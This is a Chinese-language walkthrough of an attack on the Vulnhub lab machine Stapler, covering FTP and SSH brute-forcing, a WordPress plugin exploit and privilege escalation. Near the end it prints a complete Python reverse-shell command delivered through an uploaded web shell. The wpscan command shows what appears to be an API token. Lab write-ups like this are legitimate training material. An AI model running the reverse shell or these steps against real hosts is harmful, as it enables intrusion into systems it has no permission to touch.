记一次Vulnhub靶场渗透Stapler

admin 2024年2月13日22:57:24评论13 views字数 1118阅读3分43秒阅读模式

记一次Vulnhub靶场渗透Stapler

一、梳理流程

端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)

信息收集(利用遍历,插件尝试访问,寻求突破并获取shell)

二次收集(基于已得到的服务或者主机再次信息收集

内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)

二、渗透测试

首先扫描主机

记一次Vulnhub靶场渗透Stapler
发现主机ip为192.168.47.131
记一次Vulnhub靶场渗透Stapler
扫描端口,查看开启了哪些端口
记一次Vulnhub靶场渗透Stapler
发现端口如下
记一次Vulnhub靶场渗透Stapler

记一次Vulnhub靶场渗透Stapler
ftp可以用匿名登录
用21端口做信息收集
记一次Vulnhub靶场渗透Stapler
ls

发现一个note
记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler
查看
记一次Vulnhub靶场渗透Stapler
发现一些用户名

记一次Vulnhub靶场渗透Stapler
cat 0.txt | cut -d '' -f2 | cut -d ' ' -f1 >1.txt
记一次Vulnhub靶场渗透Stapler
爆破ftp账号密码
记一次Vulnhub靶场渗透Stapler

爆破ssh账号密码

记一次Vulnhub靶场渗透Stapler
ftp没有什么用,ssh有这些
记一次Vulnhub靶场渗透Stapler
网页扫描
记一次Vulnhub靶场渗透Stapler
访问

https://192.168.47.131:12380/admin112233/

https://192.168.47.131:12380/blogblog/

记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler
用wpscan扫描
wpscan--url https://192.168.47.131:12380/blogblog/

-eu--api-token d1fuMZc2tbhJWYk9VfNsl0GZlyYxkfH6bpL0pCKFhok --disable-tls-checks

记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler
扫描出很多漏洞

记一次Vulnhub靶场渗透Stapler

https://192.168.47.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

记一次Vulnhub靶场渗透Stapler
打开readme发现插件版本信息
记一次Vulnhub靶场渗透Stapler
去exploit里寻找攻击脚本
记一次Vulnhub靶场渗透Stapler

编号寻找
记一次Vulnhub靶场渗透Stapler
下载
记一次Vulnhub靶场渗透Stapler
编辑文件
记一次Vulnhub靶场渗透Stapler
编辑这样

记一次Vulnhub靶场渗透Stapler
run

记一次Vulnhub靶场渗透Stapler
成功
记一次Vulnhub靶场渗透Stapler
下载
记一次Vulnhub靶场渗透Stapler
打开
记一次Vulnhub靶场渗透Stapler
连接数据库
记一次Vulnhub靶场渗透Stapler
查看信息

记一次Vulnhub靶场渗透Stapler
解压字典
记一次Vulnhub靶场渗透Stapler
爆破密码

记一次Vulnhub靶场渗透Stapler
得到incorrect
登录后台发现可以文件上传
记一次Vulnhub靶场渗透Stapler
上传监听文件
记一次Vulnhub靶场渗透Stapler
反弹shell
记一次Vulnhub靶场渗透Stapler

sudo提权

查看用户历史记录
记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler
ssh连接
记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler

在mysql中写php脚本提权

记一次Vulnhub靶场渗透Stapler
写入脚本
记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler
https://192.168.47.131:12380/blogblog/wpcontent/uploads/shell1.php?cmd=python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.47.128",12138));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
记一次Vulnhub靶场渗透Stapler

msf提权

记一次Vulnhub靶场渗透Stapler

选择
记一次Vulnhub靶场渗透Stapler

使用

记一次Vulnhub靶场渗透Stapler
记一次Vulnhub靶场渗透Stapler

​成功提权


关注公众号观看更多技术文章🌹

原文始发于微信公众号(青锋云盾):记一次Vulnhub靶场渗透Stapler

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月13日22:57:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次Vulnhub靶场渗透Staplerhttp://cn-sec.com/archives/2489340.html

发表评论

匿名网友 填写信息